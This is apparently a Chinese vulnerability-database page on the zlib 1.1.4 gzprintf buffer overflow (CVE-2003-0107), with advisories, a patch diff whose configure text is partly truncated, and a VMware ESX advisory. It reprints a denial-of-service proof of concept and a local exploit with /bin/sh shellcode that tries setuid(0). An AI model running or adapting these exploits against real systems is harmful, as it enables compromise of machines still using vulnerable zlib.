CVE-2003-0107
CVSS7.5
发布时间 :2003-03-07 00:00:00
修订时间 :2016-10-17 22:29:36
NMCOEPS    

[原文]Buffer overflow in the gzprintf function in zlib 1.1.4, when zlib is compiled without vsnprintf or when long inputs are truncated using vsnprintf, allows attackers to cause a denial of service or possibly execute arbitrary code.


[CNNVD]Zlib压缩库gzprintf()缓冲区溢出漏洞(CNNVD-200303-040)

        
        zlib是一款流行的压缩库,使用于多种应用程序中,包括有名的SSH实现。
        zlib的gzprintf()函数没有正确检查用户提供的数据,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以使用此函数的应用程序进程权限在系统上执行任意指令。
        zlib包含gzprintf()函数,类似fprintf(),如果提交给此函数的参数超过Z_PRINTF_BUFSIZE所定义的字节数(默认4096),可触发缓冲区溢出,精心构建提交的数据可能以使用此函数的应用程序进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0107
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0107
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-040
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2003-011.0.txt
(UNKNOWN)  CALDERA  CSSA-2003-011.0
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-004.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2003-004
http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000619
(UNKNOWN)  CONECTIVA  CLSA-2003:619
http://lists.apple.com/mhonarc/security-announce/msg00038.html
(UNKNOWN)  CONFIRM  http://lists.apple.com/mhonarc/security-announce/msg00038.html
http://marc.info/?l=bugtraq&m=104610337726297&w=2
(UNKNOWN)  BUGTRAQ  20030223 poc zlib sploit just for fun :)
http://marc.info/?l=bugtraq&m=104610536129508&w=2
(UNKNOWN)  BUGTRAQ  20030224 Re: buffer overrun in zlib 1.1.4
http://marc.info/?l=bugtraq&m=104620610427210&w=2
(UNKNOWN)  BUGTRAQ  20030225 [sorcerer-spells] ZLIB-SORCERER2003-02-25
http://marc.info/?l=bugtraq&m=104887247624907&w=2
(UNKNOWN)  GENTOO  GLSA-200303-25
http://online.securityfocus.com/archive/1/312869
(UNKNOWN)  BUGTRAQ  20030222 buffer overrun in zlib 1.1.4
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57405
(UNKNOWN)  SUNALERT  57405
http://www.iss.net/security_center/static/11381.php
(VENDOR_ADVISORY)  XF  zlib-gzprintf-bo(11381)
http://www.kb.cert.org/vuls/id/142121
(UNKNOWN)  CERT-VN  VU#142121
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:033
(UNKNOWN)  MANDRAKE  MDKSA-2003:033
http://www.redhat.com/support/errata/RHSA-2003-079.html
(UNKNOWN)  REDHAT  RHSA-2003:079
http://www.redhat.com/support/errata/RHSA-2003-081.html
(UNKNOWN)  REDHAT  RHSA-2003:081
http://www.securityfocus.com/bid/6913
(UNKNOWN)  BID  6913

- 漏洞信息

Zlib压缩库gzprintf()缓冲区溢出漏洞
高危 边界条件错误
2003-03-07 00:00:00 2006-09-20 00:00:00
远程  
        
        zlib是一款流行的压缩库,使用于多种应用程序中,包括有名的SSH实现。
        zlib的gzprintf()函数没有正确检查用户提供的数据,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以使用此函数的应用程序进程权限在系统上执行任意指令。
        zlib包含gzprintf()函数,类似fprintf(),如果提交给此函数的参数超过Z_PRINTF_BUFSIZE所定义的字节数(默认4096),可触发缓冲区溢出,精心构建提交的数据可能以使用此函数的应用程序进程权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 第三方补丁如下:
        diff -Naur zlib-1.1.4/ChangeLog zlib-1.1.4-vsnprintf/ChangeLog
        --- zlib-1.1.4/ChangeLog 2002-03-11 15:02:35.000000000 +0000
        +++ zlib-1.1.4-vsnprintf/ChangeLog 2003-02-24 05:31:41.000000000 +0000
        @@ -1,6 +1,13 @@
        
         ChangeLog file for zlib
        
        +Changes in 1.1.4-patched (23 February 2003)
        +- fix a security vulnerability related to improper use of snprintf/vsnprintf
        + function.
        +- ./configure now detects the presence of snprintf/vsnprintf and enables it
        + automatically if present.
        +- README.vsnprintf added.
        +
         Changes in 1.1.4 (11 March 2002)
         - ZFREE was repeated on same allocation on some error conditions.
         This creates a security problem described in
        diff -Naur zlib-1.1.4/README.vsnprintf zlib-1.1.4-vsnprintf/README.vsnprintf
        --- zlib-1.1.4/README.vsnprintf 1970-01-01 00:00:00.000000000 +0000
        +++ zlib-1.1.4-vsnprintf/README.vsnprintf 2003-02-24 05:13:28.000000000 +0000
        @@ -0,0 +1,23 @@
        +During a recent audit of zlib-1.1.4, a buffer-overflow and string-format
        +vulnerability was found in the gzprintf() function. This has been corrected in
        +this version of zlib; in addition, some ./configure checks have been added to
        +make sure the host system can utilize the corrections fully.
        +
        +As a result, it is now strongly recommended that your host system or compiler
        +provide a fully C99-compliant implementation of the vsnprintf() function.
        +Anything less will reduce the functionality and/or security of the gzprintf()
        +function. The most critical aspect is that vsnprintf() should be present and
        +should provide a return value. If this function is missing, one of the
        +fallback functions (vsprintf(), snprintf(), vsnprintf()) will have to be used,
        +and if so, they too should return a value. If your system is lacking in any of
        +these aspects, the ./configure script should warn you and refer you to this
        +file.
        +
        +In addition, the HAS_vsnprintf and HAS_snprintf macros are automatically
        +defined if these functions are available. zlib-1.1.4 and older versions did
        +not do this, potentially leading to a broken and vulnerable zlib even when the
        +host system supported the requisite functionality to avoid this.
        +
        +
        + -- Kelledin <kelledin@users.sourceforge.net>
        +
        diff -Naur zlib-1.1.4/configure zlib-1.1.4-vsnprintf/configure
        --- zlib-1.1.4/configure 1998-07-08 18:19:35.000000000 +0000
        +++ zlib-1.1.4-vsnprintf/configure 2003-02-24 05:13:28.000000000 +0000
        @@ -156,6 +156,209 @@
         fi
        
         cat > $test.c <        +#include
        +
        +#if (defined(__MSDOS__) || defined(_WINDOWS) || defined(_WIN32) || defined(__WIN32__) || defined(WIN32) || defined(__STDC__) || defined(__cplusplus) || defined(__OS2__)) && !defined(STDC)
        +# define STDC
        +#endif
        +
        +int main() {
        + int i;
        +
        + i=0;
        +#ifndef STDC
        + choke me
        +#endif
        +
        + return 0;
        +}
        +EOF
        +
        +if test "`($CC -c $CFLAGS $test.c) 2>&1`" = ""; then
        + echo "Checking whether to use vsnprintf() or snprintf()... using vsnprintf()"
        +
        + cat > $test.c <        +#include
        +#include
        +
        +int mytest(char *fmt, ...) {
        + char buf[20];
        + va_list ap;
        +
        + va_start(ap, fmt);
        + vsnprintf(buf, sizeof(buf), fmt, ap);
        + return 0;
        +}
        +
        +int main() {
        + return (mytest("Hello%d\n", 1));
        +}
        +EOF
        +
        + if test "`($CC -c $CFLAGS $test.c) 2>&1`" = ""; then
        + CFLAGS="$CFLAGS -DHAS_vsnprintf"
        + echo "Checking for vsnprintf() in stdio.h... Yes."
        +
        + cat > $test.c <        +#include
        +#include
        +
        +int mytest(char *fmt, ...) {
        + int i;
        + char buf[20];
        + va_list ap;
        +
        + va_start(ap, fmt);
        + i=vsnprintf(buf, sizeof(buf), fmt, ap);
        + return 0;
        +}
        +
        +int main() {
        + return (mytest("Hello%d\n", 1));
        +}
        +EOF
        +
        + if test "`($CC -c $CFLAGS $test.c) 2>&1`" = ""; then
        + CFLAGS="$CFLAGS -DHAS_vsnprintf_return"
        + echo "Checking for return value of vsnprintf()... Yes."
        + else
        + echo "Checking for return value of vsnprintf()... No."
        + echo " WARNING: apparently vsnprintf() does not return a value. zlib"
        + echo " can build but will be open to possible string-format security"
        + echo " vulnerabilities. See README.vsnprintf for more info."
        + echo
        + fi
        + else
        + echo "Checking for vsnprintf() in stdio.h... No."
        + echo " WARNING: vsnprintf() not found, falling back to vsprintf(). zlib"
        + echo " can build but will be open to possible buffer-overflow security"
        + echo " vulnerabilities. See README.vsnprintf for more info."
        + echo
        +
        + cat > $test.c <        +#include
        +#include
        +
        +int mytest(char *fmt, ...) {
        + int i;
        + char buf[20];
        + va_list ap;
        +
        + va_start(ap, fmt);
        + i=vsprintf(buf, fmt, ap);
        + return 0;
        +}
        +
        +int main() {
        + return (mytest("Hello%d\n", 1));
        +}
        +EOF
        +
        + if test "`($CC -c $CFLAGS $test.c) 2>&1`" = ""; then
        + CFLAGS="$CFLAGS -DHAS_vsprintf_return"
        + echo "Checking for return value of vsprintf()... Yes."
        + else
        + echo "Checking for return value of vsprintf()... No."
        + echo " WARNING: apparently vsprintf() does not return a value. zlib"
        + echo " can build but will be open to possible string-format security"
        + echo " vulnerabilities. See README.vsnprintf for more info."
        + echo
        + fi
        + fi
        +else
        + echo "Checking whether to use vsnprintf() or snprintf()... using snprintf()"
        +
        + cat > $test.c <        +#include
        +#include
        +
        +int mytest() {
        + char buf[20];
        + va_list ap;
        +
        + va_start(ap, fmt);
        + snprintf(buf, sizeof(buf), fmt, ap);
        + return 0;
        +}
        +
        +int main() {
        + return (mytest());
        +}
        +EOF
        +
        + if test "`($CC -c $CFLAGS $test.c) 2>&1`" = ""; then
        + CFLAGS="$CFLAGS -DHAS_snprintf"
        + echo "Checking for snprintf() in stdio.h... Yes."

- 漏洞信息 (22273)

Zlib 1.1.4 Compression Library gzprintf() Buffer Overrun Vulnerability (1) (EDBID:22273)
linux dos
2003-02-23 Verified
0 Richard Kettlewel
N/A [点击下载]
source: http://www.securityfocus.com/bid/6913/info

A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs becuase the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function.

Successful exploitation of this vulnerability may allow an attacker to execute arbitrary instructions.

Note that only Zlib 1.1.4 has been reported vulnerable to this issue. It is not yet known whether earlier versions are also affected. 

#include <zlib.h>
    #include <errno.h>
    #include <stdio.h>

    int main(void) {
      gzFile f;
      int ret;

      if(!(f = gzopen("/dev/null", "w"))) {
        perror("/dev/null");
        exit(1);
      }
      ret = gzprintf(f, "%10240s", "");
      printf("gzprintf -> %d\n", ret);
      ret = gzclose(f);
      printf("gzclose -> %d [%d]\n", ret, errno);
      exit(0);
    }

		

- 漏洞信息 (22274)

Zlib 1.1.4 Compression Library gzprintf() Buffer Overrun Vulnerability (2) (EDBID:22274)
linux remote
2003-02-23 Verified
0 CrZ
N/A [点击下载]
source: http://www.securityfocus.com/bid/6913/info
 
A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs becuase the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function.
 
Successful exploitation of this vulnerability may allow an attacker to execute arbitrary instructions.
 
Note that only Zlib 1.1.4 has been reported vulnerable to this issue. It is not yet known whether earlier versions are also affected. 

C local exploit for zlib <= 1.1.4
/      just for fun..not for root :)
\
/   Usage: gcc -o zlib zlib.c -lz
\
/   by CrZ [crazy_einstein@yahoo.com] lbyte
[lbyte.void.ru]
*/


#include <zlib.h>
#include <errno.h>
#include <stdio.h>


int main(int argc, char **argv) {
        char shell[]=
                "\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
                "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
                "\xc0\x88\x43\x07\x89\x5b\x08\x89"
                "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
                "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
                "/bin/sh";
        gzFile f;
        int ret;
        long xret;
        char cret[10];
        char badbuff[10000];
        int i;

        sprintf(badbuff,"%p",shell);
        sscanf(badbuff,"0x%x",&xret);

        printf("[>] exploiting...\n");

        if(!(f = gzopen("/dev/null", "w"))) {
                perror("/dev/null");
                exit(1);
        }

        printf("[>] xret = 0x%x\n",xret);


sprintf(cret,"%c%c%c%c",(xret&0xff)+4,(xret>>8)&0xff,

(xret>>16)&0xff,(xret>>24)&0xff);

        bzero(badbuff,sizeof(badbuff));

        for(i=0;i<5000;i+=4) strcat(badbuff,cret);

        setuid(0);
        setgid(0);
        ret = gzprintf(stderr, "%s", badbuff );
        setuid(0);
        setgid(0);
        printf(">Sent!..\n");
        printf("gzprintf -> %d\n", ret);
        ret = gzclose(f);
        printf("gzclose -> %d [%d]\n", ret, errno);

        exit(0);
}

		

- 漏洞信息 (F55667)

VMware Security Advisory 2007-0003 (PacketStormID:F55667)
2007-04-05 00:00:00
VMware  vmware.com
advisory
CVE-2005-3011,CVE-2006-4810,CVE-2007-1270,CVE-2007-1271,CVE-2005-2096,CVE-2005-1849,CVE-2003-0107,CVE-2005-1704
[点击下载]

VMware Security Advisory - ESX 3.0.1 and 3.0.0 patches address several security issues.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- -------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2007-0003
Synopsis:          VMware ESX 3.0.1 and 3.0.0 server security updates
Issue date:        2007-04-02
Updated on:        2007-04-02
CVE numbers:       CVE-2005-3011 CVE-2006-4810 CVE-2007-1270
                   CVE-2007-1271 CVE-2005-2096 CVE-2005-1849
                   CVE-2003-0107 CVE-2005-1704
- -------------------------------------------------------------------

1. Summary:

ESX 3.0.1 and 3.0.0 patches address several security issues.

2. Relevant releases:

VMware ESX 3.0.1 without patches ESX-2559638, ESX-1161870, ESX-3416571,
ESX-5011126, ESX-7737432, ESX-7780490, ESX-8174018, ESX-8852210,
ESX-9617902,
ESX-9916286

VMware ESX 3.0.0 without patches ESX-1121906, ESX-131737, ESX-1870154,
ESX-392718, ESX-4197945, ESX-4921691, ESX-5752668, ESX-7052426, ESX-3616065

3. Problem description:

Problems addressed by these patches:

a.   texinfo service console update

     Updated texinfo packages for the service console fix two security
     vulnerabilities are now available.  A buffer overflow in the the
     program texinfo could allow local user to execute arbitrary code in
     the service console via a crafted texinfo file.  And could allow a
     local user to overwrite arbitrary files via a symlink attack on
     temporary files.

     The Common Vulnerabilities and Exposures project (cve.mitre.org)
     has assigned the names CVE-2005-3011 and CVE-2006-4810 to these
     issues.

     ESX 301 Download Patch ESX-2559638
     ESX 300 Download Patch ESX-1121906

b.   This bundle is a group of patches to resolve two possible security
issues.

     They are as follows:
     A VMware internal security audit revealed a double free condition.
     It may be possible for an attacker to influence the operation of
     the system. In most circumstances, this influence will be limited
     to denial of service or information leakage, but it is
     theoretically possible for an attacker to insert arbitrary code
     into a running program. This code would be executed with the
     permissions of the vulnerable program.  There are no known exploits
     for this issue.

     The Common Vulnerabilities and Exposures project (cve.mitre.org)
     has assigned the name CVE-2007-1270 to this issue.

     A VMware internal security audit revealed a potential buffer
     overflow condition. There are no known vulnerabilities, but such
     vulnerabilities may be used to elevate privileges or to crash the
     application and thus cause a denial of service.

     The Common Vulnerabilities and Exposures project (cve.mitre.org)
     has assigned the name CVE-2007-1271 to this issue.

     The following patches are contained within this bundle:

     ESX 301                      ESX 300
     -------                     --------
     ESX-1161870                  ESX-131737
     ESX-3416571                  ESX-1870154
     ESX-5011126                  ESX-392718
     ESX-7737432                  ESX-4197945
     ESX-7780490                  ESX-4921691
     ESX-8174018                  ESX-5752668
     ESX-8852210                  ESX-7052426
     ESX-9617902                  ESX-9976400

     ESX 301 Download Patch Bundle ESX-6431040
     ESX 300 Download Patch Bundle ESX-5754280

c.   This patch updates internally used zlib libraries in order to
     address potential security issues with older versions of this
     library.

     The Common Vulnerabilities and Exposures project (cve.mitre.org)
     has assigned the names CVE-2005-2096, CVE-2005-1849, CVE-2003-0107
     to these issues.

     ESX 301 Download Patch ESX-9916286
     ESX 300 Download Patch ESX-3616065

d.  binutils service console update

     NOTE: This vulnerability and update only apply to ESX 3.0.0.

     A integer overflow in the Binary File Descriptor (BFD) library for
     the GNU Debugger before version 6.3, binutils, elfutils, and
     possibly other packages, allows user-assisted attackers to execute
     arbitrary code via a crafted object file that specifies a large
     number of section headers, leading to a heap-based buffer overflow.

     The Common Vulnerabilities and Exposures project (cve.mitre.org)
     has assigned the name CVE-2005-1704 to this issue.

     ESX 300 Download Patch ESX-55052

4. Solution:

Please review the Patch notes for your version of ESX and verify the
md5sum of your downloaded file.

  ESX 3.0.1
  http://www.vmware.com/support/vi3/doc/esx-2559638-patch.html
  md5sum 9ee9d9769dfe2668aa6a4be2df284ea6

  http://www.vmware.com/support/vi3/doc/esx-6431040-patch.html
  md5sum ef6bc745b3d556e0736fd39b8ddc8087

  http://www.vmware.com/support/vi3/doc/esx-9916286-patch.html
  md5sum 7b98cfe1b2e0613c368d4080dcacccb8

  ESX 3.0.0
  http://www.vmware.com/support/vi3/doc/esx-55052-patch.html
  md5sum 8d45e36ec997707ebe68d84841026fef

  http://www.vmware.com/support/vi3/doc/esx-1121906-patch.html
  md5sum 02c5bcccea156dd0db93177e5e3fab8b

  http://www.vmware.com/support/vi3/doc/esx-3616065-patch.html
  md5sum 90e4face2edaab07080531a37a49ec01

  http://www.vmware.com/support/vi3/doc/esx-5754280-patch.html
  md5sum 82b3c7e18dd1422f30c4aa9e477c6a27

5. References:

  ESX 3.0.1

Patch URL:http://www.vmware.com/support/vi3/doc/esx-2559638-patch.html
Patch URL:http://www.vmware.com/support/vi3/doc/esx-6431040-patch.html
Patch URL:http://www.vmware.com/support/vi3/doc/esx-9916286-patch.html
Knowledge base URL:http://kb.vmware.com/kb/2559638
Knowledge base URL:http://kb.vmware.com/kb/6431040
Knowledge base URL:http://kb.vmware.com/kb/9916286

  ESX 3.0.0

Patch URL:http://www.vmware.com/support/vi3/doc/esx-55052-patch.html
Patch URL:http://www.vmware.com/support/vi3/doc/esx-1121906-patch.html
Patch URL:http://www.vmware.com/support/vi3/doc/esx-3616065-patch.html
Patch URL:http://www.vmware.com/support/vi3/doc/esx-5754280-patch.html
Knowledge base URL:http://kb.vmware.com/kb/55052
Knowledge base URL:http://kb.vmware.com/kb/1121906
Knowledge base URL:http://kb.vmware.com/kb/3616065
Knowledge base URL:http://kb.vmware.com/kb/55052


  CVE numbers

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3011
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4810
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1270
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1271
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2096
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1849
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0107
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1704

6. Contact:

http://www.vmware.com/security

VMware Security Response Policy
http://www.vmware.com/vmtn/technology/security/security_response.html

E-mail:  security@vmware.com

Copyright 2007 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGFAiH6KjQhy2pPmkRCDhvAJ9IdzXG4Ino7NGYPnRvW5ZLFMdhRgCgk1Rr
bGpwMyFZk0OMLWyA/L8PODQ=
=MjIU
-----END PGP SIGNATURE-----
    

- 漏洞信息

6599
zlib gzprintf() Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in zlib. The gzprintf() function fails to validate input resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2003-02-21 Unknow
2003-02-21 Unknow

- 解决方案

Upgrade to version 1.1.4-r1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Zlib Compression Library gzprintf() Buffer Overrun Vulnerability
Boundary Condition Error 6913
Yes No
2003-02-23 12:00:00 2007-04-06 02:52:00
The discovery of this vulnerability has been credited to Richard Kettlewell <rjk@greenend.org.uk>.

- 受影响的程序版本

zlib zlib 1.1.4
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ GLT GLT 0.6
+ NetBSD NetBSD 1.6
+ NetBSD NetBSD 1.5.3
+ NetBSD NetBSD 1.5.2
+ NetBSD NetBSD 1.5.1
+ NetBSD NetBSD 1.5
- NullSoft Winamp 2.79
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG 1.1
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux Advanced Work Station 2.1
+ Sun Cobalt Qube 3
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt Qube3 Japanese 4000WGJ
+ Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ
+ Sun Cobalt Qube3 Japanese w/Caching 4010WGJ
+ Sun Cobalt Qube3 w/ Caching and RAID 4100WG
+ Sun Cobalt Qube3 w/Caching 4010WG
+ Sun Cobalt RaQ 4
+ Sun Cobalt RaQ XTR
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ XTR Japanese 3500R-ja
+ Sun Cobalt RaQ4 3001R
+ Sun Cobalt RaQ4 Japanese RAID 3100R-ja
+ Sun Cobalt RaQ4 RAID 3100R
+ Sun Linux 5.0
VMWare ESX Server 3.0.1
VMWare ESX Server 3.0
Sun SunOS 5.9 _x86
Sun SunOS 5.9
SGI ProPack 2.3
SGI ProPack 2.2.1
SCO Open Server 5.0.7
SCO Open Server 5.0.6
SCO Open Server 5.0.5

- 漏洞讨论

A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs becuase the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function.

Successful exploitation of this vulnerability may allow an attacker to execute arbitrary instructions.

Note that only Zlib 1.1.4 has been reported vulnerable to this issue. It is not yet known whether earlier versions are also affected.

- 漏洞利用

The following proof-of-concept exploits have been made available:

- 解决方案

Please see the references for more information.


zlib zlib 1.1.4

Sun SunOS 5.9

Sun SunOS 5.9 _x86

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站